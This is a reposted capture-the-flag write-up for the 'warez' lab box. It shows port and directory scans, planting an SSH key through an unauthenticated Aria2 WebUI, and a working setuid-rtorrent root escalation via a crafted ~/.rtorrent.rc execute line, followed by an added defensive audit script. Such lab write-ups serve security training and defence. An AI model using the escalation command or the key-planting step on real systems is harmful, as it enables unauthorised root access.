[OSCP] warez

admin · 2024-09-26 13:17:26 · 4 views · 2453 characters · 8 min 10 s read
Box introduction

Name: warez
Difficulty: easy
Techniques: webui-aria2, writing an SSH public key through webui-aria2, rtorrent privilege escalation

Information gathering

Host discovery

[Screenshot: host discovery; the target is 192.168.1.55]

Port scanning

└─# nmap -sV -A -p- -T4 192.168.1.55
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-21 03:57 EST
Nmap scan report for 192.168.1.55
Host is up (0.00096s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 cc:00:63:dd:49:fb:1c:c7:ac:69:63:bc:05:1a:59:cd (RSA)
| 256 9b:19:49:25:eb:9c:60:c5:2b:ec:2a:d4:fd:d1:c2:f4 (ECDSA)
|_ 256 41:16:e6:d0:a0:da:22:4f:07:3f:c8:cf:60:2c:02:79 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Aria2 WebUI
|_http-server-header: nginx/1.18.0
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
MAC Address: 08:00:27:80:5D:88 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.96 ms 192.168.1.55

Directory scanning

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.55 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.55
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.55/index.html (Status: 200) [Size: 81758]
http://192.168.1.55/flags (Status: 301) [Size: 169] [--> http://192.168.1.55/flags/]
http://192.168.1.55/robots.txt (Status: 200) [Size: 12]
http://192.168.1.55/result.txt (Status: 200) [Size: 1585]

Gaining access

In the Aria2 WebUI we can see that the download directory is set to the home directory of the carolina account.

[Screenshot: Aria2 WebUI settings, download directory pointing at carolina's home]

We try to upload our public key into carolina's account.

The public key upload succeeds, and connecting over SSH gets us a shell.

ssh carolina@192.168.1.55

[Screenshot: SSH session as carolina]

Privilege escalation

Listing the SUID binaries with the command in the screenshot shows rtorrent, which looks abusable, so we try it.

[Screenshot: SUID binary listing showing rtorrent]

carolina@warez:/tmp$ echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
carolina@warez:/tmp$ rtorrent
# id
uid=1000(carolina) gid=1000(carolina) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(carolina)
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
HMVKeepsharing
#
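A defensive counterpart to the two steps this box chains (aria2 RPC with no secret and a download directory inside a user's home, and a setuid rtorrent that honours the caller's ~/.rtorrent.rc), as an added example that is not part of the original write-up: a POSIX sh audit that flags both on a host. The aria2 config path and the constructed sample configs are assumptions.

```shell
# Added defensive audit for the two weaknesses this box chains (example code, not
# part of the original write-up; the config path is an assumption).
# Usage on a host:  . ./audit.sh && audit_host /etc/aria2/aria2.conf

# Print one finding per aria2 setting that lets an unauthenticated remote client
# write files into a user's home directory.
check_aria2_conf() {
    conf="$1"
    [ -f "$conf" ] || return 0
    grep -q '^enable-rpc=true' "$conf" || return 0   # RPC disabled: nothing reachable
    grep -q '^rpc-secret=.' "$conf" \
        || echo "aria2: enable-rpc without rpc-secret; JSON-RPC (port 6800) accepts any caller"
    grep -q '^rpc-listen-all=true' "$conf" \
        && echo "aria2: rpc-listen-all=true exposes RPC beyond localhost"
    dir=$(sed -n 's/^dir=//p' "$conf" | tail -n 1)
    case "$dir" in
        /home/*|/root|/root/*)
            echo "aria2: download dir '$dir' is a home directory; remote downloads can overwrite dotfiles such as ~/.ssh/authorized_keys" ;;
    esac
    return 0
}

# Print a finding if rtorrent is setuid: it reads the invoking user's ~/.rtorrent.rc
# and runs its "execute" lines with the elevated effective UID.
check_rtorrent_suid() {
    bin="$1"
    [ -n "$bin" ] || bin=$(command -v rtorrent 2>/dev/null) || return 0
    [ -u "$bin" ] && echo "rtorrent: $bin is setuid; strip the bit (chmod u-s) and run it unprivileged"
    return 0
}

audit_host() {
    check_aria2_conf "${1:-/etc/aria2/aria2.conf}"
    check_rtorrent_suid
}

# Self-demo on a constructed config mirroring the box (RPC on, no secret, dir set to
# a home directory) and on its hardened version, which yields no findings.
demo() {
    t=$(mktemp -d)
    printf 'enable-rpc=true\nrpc-listen-all=true\ndir=/home/carolina\n' > "$t/weak.conf"
    printf 'enable-rpc=true\nrpc-secret=CHANGE_ME\nrpc-listen-all=false\ndir=/srv/aria2\n' > "$t/fixed.conf"
    echo "weak.conf:";  check_aria2_conf "$t/weak.conf"
    echo "fixed.conf:"; check_aria2_conf "$t/fixed.conf"
    rm -rf "$t"
}
demo
```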

End

"Likes, views and shares are all great support"

Originally published on the WeChat official account 贝雷帽SEC: [OSCP] warez

Please keep this link when reposting (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/3115181.html